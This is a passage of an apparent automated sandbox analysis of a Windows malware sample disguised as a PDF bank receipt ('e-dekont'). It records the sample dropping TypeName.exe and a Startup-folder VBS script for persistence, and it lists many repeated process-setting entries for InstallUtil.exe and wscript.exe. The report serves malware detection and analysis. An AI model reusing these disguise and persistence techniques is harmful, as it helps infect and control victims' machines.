              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B274 push FFFFFF8Bh; ret 0_2_06C3B276
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C34278 push es; ret 0_2_06C3442C
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3B3EB push FFFFFF8Bh; iretd 0_2_06C3B3EF
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\TypeName.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbsJump to dropped file
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbsJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbsJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\TypeName.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
